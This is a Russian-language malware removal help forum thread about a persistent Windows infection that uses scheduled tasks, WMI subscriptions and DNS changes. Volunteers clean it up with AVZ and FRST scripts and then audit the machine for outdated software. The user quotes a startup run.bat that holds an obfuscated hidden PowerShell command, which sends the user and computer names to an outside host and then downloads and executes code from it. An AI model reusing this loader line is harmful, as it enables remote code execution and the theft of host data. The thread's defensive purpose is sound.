Решена Blackball?, mi6.bin задачи в планировщике

[Iceman]

Добрый день.

Уже несколько раз приходится бороться со следующей проблемой.

В планировщике создаются задачи, запускающие скрипты PowerShell в огромном количестве, меняется DNS на 8.8.8.8 и 9.9.9.9 в папке C:\Windows\Temp появляются файлы прикрепленные к теме.
После удаления задач, файлов и исправления DNS всё начинает работать нормально, но они могут появиться заново как через день, так и через месяц. Будто не везде получается зачистить.

Сегодня с помощью FRST было удалено в очередной раз следующее:

Task: {A5255791-0097-41F6-A596-C8E450ECB13E} - System32\Tasks\t.hwqloan.com => t.hwqloan.com
Task: {C1410759-C17F-4A6B-9F85-AA01256620E1} - System32\Tasks\blackball1 => blackball1
Task: {E9355185-79E0-4AF0-A46C-63D8E68F7E1D} - System32\Tasks\blackball => blackball
WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"c7sASmwdf\"",Filter="__EventFilter.Name=\"f7sASmwdf\"::
WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"BVTConsumer\"",Filter="__EventFilter.Name=\"BVTFilter\"::
WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"c1YZNMOLn\"",Filter="__EventFilter.Name=\"f1YZNMOLn\"::
WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"cpFx4PKRaNEl\"",Filter="__EventFilter.Name=\"fpFx4PKRaNEl\"::
WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"c9vTrG1S\"",Filter="__EventFilter.Name=\"f9vTrG1S\"::
WMI:subscription\__EventFilter->f1YZNMOLn::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 3600 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System']
WMI:subscription\__EventFilter->f9vTrG1S::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 3600 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System']
WMI:subscription\__EventFilter->t.hwqloan.com::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 3600 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System']
WMI:subscription\__EventFilter->blackball1::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 3600 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System']
WMI:subscription\__EventFilter->BVTFilter::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99]
WMI:subscription\__EventFilter->fpFx4PKRaNEl::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 3600 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System']
WMI:subscription\__EventFilter->f7sASmwdf::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 3600 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System']

 

[regist]

Перед тем как просить о помощи, прочтите эти правила оформления запроса.

 

[Sandor]

Не нужно прикреплять ничего из того, что не запросил консультант. Тем более подозрительные файлы.
Проверить их можете на www.virustotal.com и при желании дать здесь ссылку на результат проверки.

 

[Iceman]

Логи прикрепил, но это уже с удаленными файлами. Если тут ничего нет, то в следующий раз сделаю сканирование при работе вируса.

 

[Iceman]

Не нужно прикреплять ничего из того, что не запросил консультант. Тем более подозрительные файлы.
Проверить их можете на www.virustotal.com и при желании дать здесь ссылку на результат проверки.

Вот результат проверки нескольких файов:
VirusTotal
VirusTotal
VirusTotal

 

[Sandor]

Этот файл

C:\Users\administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\run.bat

вам известен? Процитируйте его содержимое.

 

[Iceman]

Этот файл

вам известен? Процитируйте его содержимое.

Время создания совпадает с остальными вредоносными файлами из Temp.
Вот его содержимое:


cmd /c start /b powershell -w hidden IE`x(Ne`w-Obj`ect Net.WebC`lient).DownLoadString('hххp://t.ss'+'700.co/7p.php?1.0*ipc_bat*%username%*%computername%*'+[Environment]::OSVersion.version.Major);bpu ('hххp://t.ss'+'700.co/ipc.jsp?bat_1.0')
cmd /c del %0

 

[Sandor]

Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.

Выполните скрипт в AVZ (Файл - Выполнить скрипт):

begin
 ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
 QuarantineFile('C:\Users\administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\run.bat', '');
 QuarantineFile('C:\Users\TEMP\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\run.bat', '');
 QuarantineFile('C:\Users\test2016.PGPI\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\run.bat', '');
 QuarantineFile('C:\Users\test2016\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\run.bat', '');
 DeleteFile('C:\Users\administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\run.bat');
 DeleteFile('C:\Users\TEMP\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\run.bat');
 DeleteFile('C:\Users\test2016.PGPI\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\run.bat');
 DeleteFile('C:\Users\test2016\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\run.bat');
ExecuteSysClean;
 ExecuteRepair(1);
 ExecuteRepair(3);
 ExecuteWizard('SCU', 2, 3, true);
RebootWindows(true);
end.

Компьютер перезагрузится.

После перезагрузки, выполните такой скрипт:

begin
 DeleteFile(GetAVZDirectory+'quarantine.7z');
 ExecuteFile(GetAVZDirectory+'7za.exe', 'a -mx9 -pmalware quarantine .\Quarantine\*', 1, 300000, false);
end.

Файл quarantine.7z из папки с распакованной утилитой AVZ отправьте с помощью формы отправки карантина или на этот почтовый ящик: quarantine <at> safezone.cc (замените <at> на @) с указанием ссылки на тему в теме (заголовке) сообщения и с указанием пароля: malware в теле письма.

Через Панель управления (Параметры) - Удаление программ (Приложения и возможности) - удалите нежелательное ПО:

MediaGet

Для повторной диагностики запустите снова AutoLogger.
Прикрепите к следующему сообщению свежий CollectionLog.

 

[Iceman]

Скрипты выполнил
Файл отправил через форму
MediaGet удалил
Повторно запустил диагностику и прикрепил файл

 

[Sandor]

Скачайте Farbar Recovery Scan Tool (или с зеркала) и сохраните на Рабочем столе. (Для верности, скачайте актуальную версию).

Примечание: необходимо выбрать версию, совместимую с вашей операционной системой. Если вы не уверены, какая версия подойдет для вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на вашей системе.
Когда программа запустится, нажмите Да для соглашения с предупреждением.

Нажмите кнопку Сканировать (Scan).
После окончания сканирования будут созданы отчеты FRST.txt и Addition.txt в той же папке, откуда была запущена программа. Прикрепите отчеты к своему следующему сообщению.
Подробнее читайте в этом руководстве.

 

[Iceman]

Запустил, файлы прикрепил.

 

[Sandor]

Примите к сведению - после выполнения скрипта (возможно) все открытые вкладки браузеров будут закрыты, произойдет выход из аккаунтов, временные файлы, корзина, история браузеров, куки и кэш будут очищены.

• Отключите до перезагрузки антивирус.
• Выделите следующий код:
  
  Start::
  SystemRestore: On
  CreateRestorePoint:
  HKU\S-1-5-21-3393637783-167122484-2571894537-8146\...\MountPoints2: {19b25cb8-f97e-11ea-ac57-0c5b8f279a64} - "F:\Install MegaFon Internet.exe"
  HKU\S-1-5-21-3393637783-167122484-2571894537-8146\...\MountPoints2: {2512ad03-8389-11e8-aee1-00055d352a63} - F:\AutoRun.exe
  HKU\S-1-5-21-3393637783-167122484-2571894537-8146\...\MountPoints2: {2512ad13-8389-11e8-aee1-00055d352a63} - F:\AutoRun.exe
  HKU\S-1-5-21-3393637783-167122484-2571894537-8146\...\MountPoints2: {3db958cb-f1ae-11ea-a072-00055d352a63} - F:\AutoRun.exe
  HKU\S-1-5-21-3393637783-167122484-2571894537-8146\...\MountPoints2: {3db958e7-f1ae-11ea-a072-00055d352a63} - F:\AutoRun.exe
  HKU\S-1-5-21-3393637783-167122484-2571894537-8146\...\MountPoints2: {47c435a4-dace-11ea-94eb-00055d352a63} - F:\AutoRun.exe
  HKU\S-1-5-21-3393637783-167122484-2571894537-8146\...\MountPoints2: {47c435c8-dace-11ea-94eb-00055d352a63} - F:\AutoRun.exe
  HKU\S-1-5-21-3393637783-167122484-2571894537-8146\...\MountPoints2: {7b836695-1175-11e3-a607-005056c00008} - I:\LGAutoRun.exe
  HKU\S-1-5-21-3393637783-167122484-2571894537-8146\...\MountPoints2: {85f9a0eb-fd74-11e6-ba56-08606e838466} - F:\Setup.exe
  Startup: C:\Users\yarovoy.PGPI\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\run.bat [2021-06-15] () [Файл не подписан]
  Policies: C:\Users\administrator\NTUSER.pol: Ограничение <==== ВНИМАНИЕ
  Policies: C:\ProgramData\NTUSER.pol: Ограничение <==== ВНИМАНИЕ
  Policies: C:\Users\TEMP\NTUSER.pol: Ограничение <==== ВНИМАНИЕ
  Policies: C:\Users\TEMP.PGPI\NTUSER.pol: Ограничение <==== ВНИМАНИЕ
  Policies: C:\Users\test2016\NTUSER.pol: Ограничение <==== ВНИМАНИЕ
  Policies: C:\Users\test2016.PGPI\NTUSER.pol: Ограничение <==== ВНИМАНИЕ
  Policies: C:\Users\yarovoy.PGPI\NTUSER.pol: Ограничение <==== ВНИМАНИЕ
  HKLM\SOFTWARE\Policies\Google: Ограничение <==== ВНИМАНИЕ
  HKU\.DEFAULT\SOFTWARE\Policies\Microsoft\Internet Explorer: Ограничение <==== ВНИМАНИЕ
  HKU\S-1-5-21-3393637783-167122484-2571894537-8146\SOFTWARE\Policies\Microsoft\Internet Explorer: Ограничение <==== ВНИМАНИЕ
  C:\Users\yarovoy.PGPI\AppData\Local\Google\Chrome\User Data\Default\Extensions\hpcghcdjnehpkdecaflpedhklimnejia
  CHR HKLM-x32\...\Chrome\Extension: [hpcghcdjnehpkdecaflpedhklimnejia]
  AlternateDataStreams: C:\ProgramData\Reprise:wupeogjxlctlfudivq`qsp`29hfm [0]
  HKU\S-1-5-21-3393637783-167122484-2571894537-8146\Software\Classes\.scr: scrfile =>  <==== ВНИМАНИЕ
  FirewallRules: [mediaget-tcp] => (Allow) C:\Users\yarovoy.PGPI\AppData\Local\MediaGet2\mediaget.exe => Нет файла
  FirewallRules: [mediaget-udp] => (Allow) C:\Users\yarovoy.PGPI\AppData\Local\MediaGet2\mediaget.exe => Нет файла
  EmptyTemp:
  Reboot:
  End::
• Скопируйте выделенный текст (правой кнопкой - Копировать).
• Запустите FRST (FRST64) от имени администратора.
• Нажмите Исправить (Fix) один раз (!) и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.

Компьютер будет перезагружен автоматически.

Подробнее читайте в этом руководстве.

 

[Iceman]

Выполнил, файл прикрепил.

 

[Sandor]

Теперь проверим уязвимые места и устаревшее ПО:

• Загрузите SecurityCheck by glax24 & Severnyj, сохраните утилиту на Рабочем столе и извлеките из архива.
• Запустите двойным щелчком мыши (если Вы используете Windows XP) или из меню по щелчку правой кнопки мыши Запустить от имени администратора (если Вы используете Windows Vista/7/8/8.1/10)
• Если увидите предупреждение от вашего фаервола или SmartScreen относительно программы SecurityCheck, не блокируйте ее работу
• Дождитесь окончания сканирования, откроется лог в блокноте с именем SecurityCheck.txt
• Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например C:\SecurityCheck\SecurityCheck.txt
• Прикрепите этот файл к своему следующему сообщению.

 

[Iceman]

Выполнил

 

[Sandor]

------------------------------- [ Windows ] -------------------------------
Расширенная поддержка закончилась 14.01.2020, Ваша операционная система может быть уязвима к новым типам угроз
Internet Explorer 11.0.9600.17843 Внимание! Скачать обновления
^Используйте Средство устранения неполадок при проблемах установки^
Контроль учётных записей пользователя отключен (Уровень 1)
^Рекомендуется включить уровень по умолчанию: Win+R ввести UserAccountControlSettings и Enter^
------------------------------- [ HotFix ] --------------------------------
HotFix KB3177467 Внимание! Скачать обновления
HotFix KB3125574 Внимание! Скачать обновления
HotFix KB4012212 Внимание! Скачать обновления
HotFix KB4499175 Внимание! Скачать обновления
HotFix KB4474419 Внимание! Скачать обновления
HotFix KB4490628 Внимание! Скачать обновления
HotFix KB4539602 Внимание! Скачать обновления
---------------------- [ AntiVirusFirewallInstall ] -----------------------
Kaspersky Endpoint Security 10 для Windows v.10.2.6.3733 Внимание! Скачать обновления
--------------------------- [ OtherUtilities ] ----------------------------
Microsoft .NET Framework 4.7.1 v.4.7.02558 Внимание! Скачать обновления
Microsoft OneDrive v.17.3.4604.0120 Внимание! Скачать обновления
Notepad++ v.6.8.7 Внимание! Скачать обновления
Microsoft Office профессиональный плюс 2010 v.14.0.4763.1000 Данная программа больше не поддерживается разработчиком. Обновите Microsoft Office до последней версии или используйте Office Online или LibreOffice
VMware Workstation v.7.0.1.11056 Внимание! Скачать обновления
Wireshark 1.10.8 (64-bit) v.1.10.8 Внимание! Скачать обновления
Microsoft Office Professional Plus 2010 v.14.0.4763.1000 Данная программа больше не поддерживается разработчиком. Обновите Microsoft Office до последней версии или используйте Office Online или LibreOffice
Microsoft Office Visio 2010 v.14.0.4763.1000 Данная программа больше не поддерживается разработчиком.
Evernote v. 6.1.2 v.6.1.2.2292 Внимание! Скачать обновления
------------------------------ [ ArchAndFM ] ------------------------------
WinRAR 5.01 (64-разрядная) v.5.01.0 Внимание! Скачать обновления
7-Zip 9.20 Данная версия программы больше не поддерживается разработчиком.. Удалите старую версию, скачайте и установите новую.
Архиватор WinRAR Данная версия программы больше не поддерживается разработчиком.. Удалите старую версию, скачайте и установите новую.

--------------------------------- [ P2P ] ---------------------------------
µTorrent v.3.5.5.45966 Внимание! Клиент сети P2P с рекламным модулем!.
-------------------------------- [ Java ] ---------------------------------
Java SE Development Kit 7 Update 51 (64-bit) v.1.7.0.510 Данная программа больше не поддерживается разработчиком. Рекомендуется деинсталлировать ее, скачать и установить Java SE Development Kit (jdk-16_windows-x64_bin.exe).
Java 2 Runtime Environment Standard Edition v1.2.2 Данная программа больше не поддерживается разработчиком. Рекомендуется деинсталлировать ее, скачать и установить Java SE 8 (jre-8u291-windows-i586.exe).
Java SE Development Kit 8 Update 192 v.8.0.1920.12 Данная программа больше не поддерживается разработчиком. Рекомендуется деинсталлировать ее, скачать и установить Java SE Development Kit (jdk-16_windows-x64_bin.exe).
-------------------------------- [ Media ] --------------------------------
iTunes v.12.10.4.2 Внимание! Скачать обновления
^Для проверки новой версии используйте приложение Apple Software Update^
K-Lite Mega Codec Pack 9.9.0 v.9.9.0 Внимание! Скачать обновления
QuickTime 7 v.7.79.80.95 Данная программа больше не поддерживается разработчиком и имеет известные проблемы безопасности! Рекомендуется деинсталлировать данное ПО.
--------------------------- [ AdobeProduction ] ---------------------------
Adobe AIR v.23.0.0.257 Внимание! Скачать обновления
------------------------------- [ Browser ] -------------------------------
Mozilla Firefox 41.0.2 (x86 ru) v.41.0.2 Внимание! Скачать обновления
^Проверьте обновления через меню Справка - О Firefox!^
----------------------------- [ EmailClient ] -----------------------------
The Bat! v8.8.2 (64-bit) v.8.8.2 Внимание! Скачать обновления


Обязательно включите UAC и постарайтесь установить перечисленные хотфиксы.
Остальное исправьте/обновите по возможности.

Уже несколько раз приходится бороться со следующей проблемой

Как часто это происходило? Сейчас можете оценить ушла проблема или нет?

 

[Iceman]

Как часто это происходило? Сейчас можете оценить ушла проблема или нет?

UAC был включен, видимо действия вируса его отключило. Хотфикс поставлю.
С Апреля уже раза 3 или 4. Но было на другом ПК, а сегодня появилось и на этом. За это время ничего не устанавливалось.
Очень хочется понять откуда оно лезет. Самый первый раз было выявлено на почтовом сервере, есть предположение что через Framework IIS.

 

[Sandor]

было на другом ПК

Если надумаете его проверить с нашей помощью, создайте отдельную тему.
Тут помечаю решенной и пока не закрываю.
Читайте Рекомендации после удаления вредоносного ПО

 

[Iceman]

Хорошо, спасибо.